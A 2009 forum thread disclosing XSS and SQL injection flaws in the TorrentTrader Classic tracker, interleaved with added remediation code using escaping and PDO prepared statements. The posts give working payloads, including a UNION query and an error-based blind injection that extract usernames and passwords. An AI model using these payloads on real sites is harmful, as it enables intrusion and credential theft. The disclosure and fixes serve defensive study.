TorrentTrader tracker engine

Discussion in 'Web vulnerabilities' started by HAXTA4OK, 12 Aug 2009.

  1. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Official site = http://www.torrenttrader.org/

    version TorrentTrader Classic v1.09

    XSS
    results from insufficient handling of the input data

    Code:
    print("<p>" . SORT_BY . " <a href=" . $_SERVER[PHP_SELF] . "?category=" . $_GET[category] . "&filter=" . $_GET[filter] . "&sort=votes>" . VOTES . "</a>, <a href=". $_SERVER[PHP_SELF] ."?category=" . $_GET[category] . "&filter=" . $_GET[filter] . "&sort=request>Request Name</a>, or <a href=" . $_SERVER[PHP_SELF] ."?category=" . $_GET[category] . "&filter=" . $_GET[filter] . "&sort=added>" . DATE_ADDED . "</a>.</p>");
    
    viewrequests.php?category=%3E%3Cscript%3Ealert(/Hi/)%3C/script%3E

    viewrequests.php?category=&filter=%3E%3Cscript%3Ealert(/Hi/)%3C/script%3E&sort=votes


    version TorrentTrader Classic v2.04

    XSS

    torrents.php?parent_cat=%3E%3Cscript%3Ealert(/Hi/)%3C/script%3E



    P.S. The file structure looks like TBDev's
     
    #1 HAXTA4OK, 12 Aug 2009
    Last edited: 12 Aug 2009
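The viewrequests.php line quoted above writes raw $_GET values both into the HTML body and into the href, which is why the category and filter payloads land in the page as markup. The following is an added example, not TorrentTrader's code: the same sort-link builder with the category coerced to an integer, the filter checked against a fixed list, every value URL-encoded by http_build_query() and then HTML-escaped, and a fixed script path instead of $_SERVER['PHP_SELF'] (which itself reflects request path info). The constants SORT_BY, VOTES and DATE_ADDED, the allowed filter values and the helper name build_sort_links() are assumptions for the demonstration.

```php
<?php
// Added example (not TorrentTrader code): hardened sort-link builder.
// Constant values and the allowed filter set are assumptions.
define('SORT_BY', 'Sort by');
define('VOTES', 'Votes');
define('DATE_ADDED', 'Date added');

function build_sort_links(array $get, string $self): string
{
    // category is a numeric id; coerce it. An empty value stays empty so that
    // "all categories" keeps working instead of silently becoming 0.
    $category = '';
    if (isset($get['category']) && is_scalar($get['category']) && $get['category'] !== '') {
        $category = (string)(int)$get['category'];
    }

    // filter comes from a fixed set of values; anything else is dropped.
    $allowedFilters = ['', 'open', 'filled'];          // assumed set for the example
    $filterIn = $get['filter'] ?? '';
    $filter = in_array($filterIn, $allowedFilters, true) ? $filterIn : '';

    $labels = ['votes' => VOTES, 'request' => 'Request Name', 'added' => DATE_ADDED];

    $links = [];
    foreach ($labels as $sort => $label) {
        // http_build_query URL-encodes every value; the resulting URL and the
        // label are then escaped for the HTML attribute / text context.
        $qs   = http_build_query(['category' => $category, 'filter' => $filter, 'sort' => $sort]);
        $href = htmlspecialchars($self . '?' . $qs, ENT_QUOTES, 'UTF-8');
        $text = htmlspecialchars($label, ENT_QUOTES, 'UTF-8');
        $links[] = '<a href="' . $href . '">' . $text . '</a>';
    }
    return '<p>' . SORT_BY . ' ' . implode(', ', $links) . '.</p>';
}

// Constructed request reproducing the payload from the post. The script tag
// never reaches the output: category becomes "0" and the filter is discarded.
$get = [
    'category' => '><script>alert(/Hi/)</script>',
    'filter'   => '><script>alert(/Hi/)</script>',
];
echo build_sort_links($get, '/viewrequests.php'), "\n";
```

The two points worth keeping from this: encode at the output boundary for the context you are writing into (URL, then HTML attribute), and reject or coerce values that have a known shape rather than trying to filter script tags out of free text.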
  2. [underwater]

    [underwater] Member

    Open the file torrents-details.php:
    Code:
    //speed mod
    $resSpeed = mysql_query("SELECT seeders,leechers FROM torrents
    WHERE $where visible='yes' and id = $id ORDER BY added DESC LIMIT 15")
    or sqlerr(__FILE__, __LINE__);

    Code:
    http://localhost/torrents-details.php?id=1&where=1=IF(LENGTH(@@version)>1,1,(SELECT+1+UNION+ALL+SELECT+1))--+
    Renders the page normally

    Code:
    http://localhost/torrents-details.php?id=1&where=1=IF(LENGTH(@@version)>50,1,(SELECT+1+UNION+ALL+SELECT+1))--+

    Passive XSS everywhere:

    Code:
    http://localhost/themes/default/footer.php?ttversion=<script>alert(123);</script>
    http://localhost/themes/default/header.php?SITENAME="><script>alert(123);</script>
    http://localhost/themes/default/header.php?CURUSER[username]=<script>alert(123);</script>
    http://localhost/visitorstoday.php?todayactive=<script>alert(123);</script>
    
     
  3. RulleR

    RulleR Elder

    TorrentTrader Classic 1.09
    Version : 1.09

    SQL Injection

    Vuln file: show-archived.php [line 23]
    PHP:
    $query = 'SELECT title, user, date, text FROM news WHERE id=\'' . $_GET['id'] . '\'';
    $resu = mysql_query($query) or die(mysql_error());
    Exploit:
    if magic_quotes = OFF
    Code:
    http://[host]/[path]/show-archived.php?id=1'+union+select+null,null,null,concat_ws(0x3a,username,password)+from+users+--+
    Blind SQL Injection

    Vuln file: account-signup.php [line 73]
    PHP:
    $a = (@mysql_fetch_row(@mysql_query("select count(*) from users where username='$wantusername'"))) or die(mysql_error());
    If MySQL version >= 5.0.12 and magic_quotes = OFF, data can be obtained from the Duplicate column name error
    Exploit:
    Code:
    POST http://[host]/[path]/account-signup.php HTTP/1.0
    Content-type: application/x-www-form-urlencoded
    
    wantusername=xek' and (select * from (select * from (select name_const((select concat_ws(0x3a,username,password) from users limit 0,1),1)a)b join (select name_const((select concat_ws(0x3a,username,password) from users limit 0,1),1))c)d)/*
    
    --------------------------------------------------------------
    Other vulnerabilities of this tracker
    http://www.milw0rm.com/exploits/8958
     
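The three queries quoted in this thread share one defect: request data is concatenated into SQL text, and in torrents-details.php (post #2) the request even supplies a whole `$where` fragment. The error-based variant in post #3 additionally relies on die(mysql_error()) echoing the server's message back. The following is an added example, not TorrentTrader's code, that rebuilds the show-archived.php and account-signup.php lookups from post #3 and the torrents-details.php query from post #2 with PDO prepared statements, lets the request choose only a name from a fixed map of clauses instead of raw SQL, and logs database errors server-side instead of printing them. An in-memory SQLite database stands in for MySQL; the table layouts, the sample rows, the scope names and the helper function names are assumptions.

```php
<?php
// Added example, not TorrentTrader code. Table layouts, rows and option names
// are constructed for the demonstration.

function open_db(): PDO
{
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec("CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT, user TEXT, date TEXT, text TEXT)");
    $db->exec("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)");
    $db->exec("CREATE TABLE torrents (id INTEGER PRIMARY KEY, seeders INTEGER, leechers INTEGER, visible TEXT, added TEXT)");
    // constructed sample rows
    $db->exec("INSERT INTO news VALUES (1, 'Hello', 'admin', '2009-08-12', 'first post')");
    $db->exec("INSERT INTO users VALUES (1, 'admin', 'hash-placeholder')");
    $db->exec("INSERT INTO torrents VALUES (1, 5, 2, 'yes', '2009-08-12'), (2, 0, 9, 'no', '2009-08-11')");
    return $db;
}

// show-archived.php: the id is bound as an integer, never concatenated.
function fetch_news(PDO $db, $rawId): ?array
{
    $stmt = $db->prepare('SELECT title, user, date, text FROM news WHERE id = :id');
    $stmt->bindValue(':id', (int)$rawId, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// account-signup.php: the username is bound as a string; quotes inside it are data.
function username_taken(PDO $db, string $wantusername): bool
{
    $stmt = $db->prepare('SELECT COUNT(*) FROM users WHERE username = :u');
    $stmt->bindValue(':u', $wantusername, PDO::PARAM_STR);
    $stmt->execute();
    return (int)$stmt->fetchColumn() > 0;
}

// torrents-details.php: the original took `$where` straight from the URL.
// Here the request can only pick a name; the SQL text is hard-coded.
function fetch_speed(PDO $db, $rawId, string $scope = 'all'): array
{
    $scopes = ['all' => '', 'active' => 'seeders > 0 AND '];   // assumed option names
    $extra  = $scopes[$scope] ?? '';                            // unknown names mean "all"
    $stmt = $db->prepare(
        "SELECT seeders, leechers FROM torrents WHERE {$extra}visible = 'yes' AND id = :id ORDER BY added DESC LIMIT 15"
    );
    $stmt->bindValue(':id', (int)$rawId, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Keeps database error text out of the HTTP response: the message goes to the
// server log and the caller gets null.
function guarded(callable $fn)
{
    try {
        return $fn();
    } catch (PDOException $e) {
        error_log('db error: ' . $e->getMessage());
        return null;
    }
}

$db = open_db();
// The id payload from post #3 is coerced to 1; the trailing SQL never reaches the driver.
var_dump(guarded(fn() => fetch_news($db, "1' union select null,null,null,null -- ")));
// The signup payload is compared as a literal username: no such user, so false.
var_dump(guarded(fn() => username_taken($db, "xek' and (select 1)/*")));
// An attempted `where` fragment is not a known scope name and is simply ignored.
var_dump(guarded(fn() => fetch_speed($db, 1, "1=IF(LENGTH(@@version)>1,1,(SELECT 1))--")));
```

Two design choices carry the weight here: parameters are bound with an explicit type (PDO::PARAM_INT for ids), so the database never parses request data as SQL, and the only place where SQL text varies by request is a lookup into a map the application itself owns. The guarded() wrapper matters for the blind and error-based cases in post #3: without error text in the response, the Duplicate column name trick has nothing to read, and the attacker is left with timing or boolean inference only.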